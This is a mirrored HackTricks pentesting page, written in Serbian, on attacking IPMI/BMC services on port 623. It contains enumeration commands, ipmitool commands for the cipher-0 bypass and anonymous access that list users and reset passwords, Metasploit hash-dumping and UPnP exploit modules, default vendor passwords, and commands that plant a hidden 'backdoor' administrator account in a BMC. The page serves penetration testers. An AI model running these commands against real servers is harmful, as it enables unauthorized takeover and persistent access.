maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/623-udp-ipmi.md

122 lines
7.9 KiB
Markdown
Raw Blame History

# 623/UDP/TCP - IPMI
{{#include ../banners/hacktricks-training.md}}
## Osnovne informacije
### **Pregled IPMI**
**[Intelligent Platform Management Interface (IPMI)](https://www.thomas-krenn.com/en/wiki/IPMI_Basics)** nudi standardizovani pristup za daljinsko upravljanje i nadgledanje računarskih sistema, nezavisno od operativnog sistema ili stanja napajanja. Ova tehnologija omogućava sistem administratorima da upravljaju sistemima na daljinu, čak i kada su isključeni ili neodgovaraju, i posebno je korisna za:
- Pre-OS konfiguracije pri pokretanju
- Upravljanje isključenjem
- Oporavak od sistemskih grešaka
IPMI je sposoban da nadgleda temperature, napone, brzine ventilatora i napajanja, uz pružanje informacija o inventaru, pregled hardverskih logova i slanje upozorenja putem SNMP-a. Osnovni zahtevi za njegov rad su izvor napajanja i LAN konekcija.
Od svog uvođenja od strane Intela 1998. godine, IPMI su podržavali brojni dobavljači, poboljšavajući mogućnosti daljinskog upravljanja, posebno sa podrškom verzije 2.0 za serijski prenos preko LAN-a. Ključne komponente uključuju:
- **Baseboard Management Controller (BMC):** Glavni mikro-kontroler za IPMI operacije.
- **Komunikacione magistrale i interfejsi:** Za internu i eksternu komunikaciju, uključujući ICMB, IPMB i razne interfejse za lokalne i mrežne konekcije.
- **IPMI Memorija:** Za čuvanje logova i podataka.
![https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right](https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right)
**Podrazumevani port**: 623/UDP/TCP (Obično je na UDP-u, ali može biti i na TCP-u)
## Enumeracija
### Otkriće
```bash
nmap -n -p 623 10.0.0./24
nmap -n-sU -p 623 10.0.0./24
use auxiliary/scanner/ipmi/ipmi_version
```
Možete **identifikovati** **verziju** koristeći:
```bash
use auxiliary/scanner/ipmi/ipmi_version
nmap -sU --script ipmi-version -p 623 10.10.10.10
```
### IPMI Vulnerabilities
U oblasti IPMI 2.0, značajna sigurnosna greška je otkrivena od strane Dana Farmera, otkrivajući ranjivost kroz **cipher type 0**. Ova ranjivost, detaljno dokumentovana na [Dan Farmer's research](http://fish2.com/ipmi/cipherzero.html), omogućava neovlašćen pristup sa bilo kojom lozinkom pod uslovom da je ciljana validna korisnička adresa. Ova slabost je pronađena kod raznih BMC-ova proizvođača kao što su HP, Dell i Supermicro, što sugeriše na široko rasprostranjen problem unutar svih IPMI 2.0 implementacija.
### **IPMI Authentication Bypass via Cipher 0**
Da bi se otkrila ova greška, može se koristiti sledeći Metasploit auxiliary scanner:
```bash
use auxiliary/scanner/ipmi/ipmi_cipher_zero
```
Eksploatacija ove greške je moguća sa `ipmitool`, kao što je prikazano u nastavku, omogućavajući listanje i modifikaciju korisničkih lozinki:
```bash
apt-get install ipmitool # Installation command
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password
```
### **IPMI 2.0 RAKP autentifikacija daljinskog preuzimanja heširanih lozinki**
Ova ranjivost omogućava preuzimanje heširanih lozinki sa solju (MD5 i SHA1) za bilo koje postojeće korisničko ime. Da biste testirali ovu ranjivost, Metasploit nudi modul:
```bash
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
```
### **IPMI anonimna autentifikacija**
Podrazumevana konfiguracija u mnogim BMC-ima omogućava "anonimni" pristup, koji se karakteriše praznim korisničkim imenom i lozinkom. Ova konfiguracija se može iskoristiti za resetovanje lozinki korisničkih naloga koristeći `ipmitool`:
```bash
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword
```
### **Supermicro IPMI Lozinke u Čistom Tekstu**
Kritična dizajnerska odluka u IPMI 2.0 zahteva skladištenje lozinki u čistom tekstu unutar BMC-a u svrhu autentifikacije. Skladištenje ovih lozinki na mestima kao što su `/nv/PSBlock` ili `/nv/PSStore` postavlja značajne bezbednosne brige:
```bash
cat /nv/PSBlock
```
### **Supermicro IPMI UPnP Ranljivost**
Uključivanje UPnP SSDP slušatelja u Supermicro-ovom IPMI firmveru, posebno na UDP portu 1900, uvodi ozbiljan bezbednosni rizik. Ranljivosti u Intel SDK za UPnP uređaje verzije 1.3.1, kako je detaljno opisano u [Rapid7-ovom otkriću](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play), omogućavaju pristup root-u BMC-u:
```bash
msf> use exploit/multi/upnp/libupnp_ssdp_overflow
```
### Brute Force
**HP nasumično generiše podrazumevanu lozinku** za svoj **Integrated Lights Out (iLO)** proizvod tokom proizvodnje. Ova praksa se razlikuje od drugih proizvođača, koji obično koriste **statične podrazumevane akreditive**. Sažetak podrazumevanih korisničkih imena i lozinki za različite proizvode je dat u nastavku:
- **HP Integrated Lights Out (iLO)** koristi **fabricki nasumično generisanu 8-znamenkastu string** kao svoju podrazumevanu lozinku, pokazujući viši nivo sigurnosti.
- Proizvodi kao što su **Dellov iDRAC, IBM-ov IMM** i **Fujitsu-ov Integrated Remote Management Controller** koriste lako pogađajuće lozinke kao što su "calvin", "PASSW0RD" (sa nulom) i "admin" redom.
- Slično tome, **Supermicro IPMI (2.0), Oracle/Sun ILOM** i **ASUS iKVM BMC** takođe koriste jednostavne podrazumevane akreditive, pri čemu "ADMIN", "changeme" i "admin" služe kao njihove lozinke.
## Accessing the Host via BMC
Administrativni pristup Kontroleru za upravljanje matičnom pločom (BMC) otvara različite puteve za pristup operativnom sistemu hosta. Jednostavan pristup uključuje iskorišćavanje KVM funkcionalnosti BMC-a. To se može uraditi ili ponovnim pokretanjem hosta u root shell putem GRUB-a (koristeći `init=/bin/sh`) ili pokretanjem sa virtuelnog CD-ROM-a postavljenog kao disk za oporavak. Ove metode omogućavaju direktnu manipulaciju diskom hosta, uključujući umetanje backdoor-a, ekstrakciju podataka ili bilo koje potrebne radnje za procenu sigurnosti. Međutim, ovo zahteva ponovno pokretanje hosta, što je značajan nedostatak. Bez ponovnog pokretanja, pristup aktivnom hostu je složeniji i varira u zavisnosti od konfiguracije hosta. Ako fizička ili serijska konzola hosta ostane prijavljena, može se lako preuzeti putem KVM-a BMC-a ili serijske veze preko LAN-a (sol) putem `ipmitool`. Istraživanje iskorišćavanja zajedničkih hardverskih resursa, kao što su i2c magistrala i Super I/O čip, je oblast koja zahteva dalju istragu.
## Introducing Backdoors into BMC from the Host
Nakon kompromitovanja hosta opremljenog BMC-om, **lokalni BMC interfejs se može iskoristiti za umetanje backdoor korisničkog naloga**, stvarajući trajnu prisutnost na serveru. Ovaj napad zahteva prisustvo **`ipmitool`** na kompromitovanom hostu i aktivaciju podrške za BMC drajvere. Sledeće komande ilustruju kako se novi korisnički nalog može ubrizgati u BMC koristeći lokalni interfejs hosta, što zaobilazi potrebu za autentifikacijom. Ova tehnika je primenljiva na širok spektar operativnih sistema uključujući Linux, Windows, BSD, pa čak i DOS.
```bash
ipmitool user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 ADMIN true false false Unknown (0x00)
3 root true false false Unknown (0x00)
ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4
ipmitool user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 ADMIN true false false Unknown (0x00)
3 root true false false Unknown (0x00)
4 backdoor true false true ADMINISTRATOR
```
## Shodan
- `port:623`
## References
- [https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/)
{{#include ../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink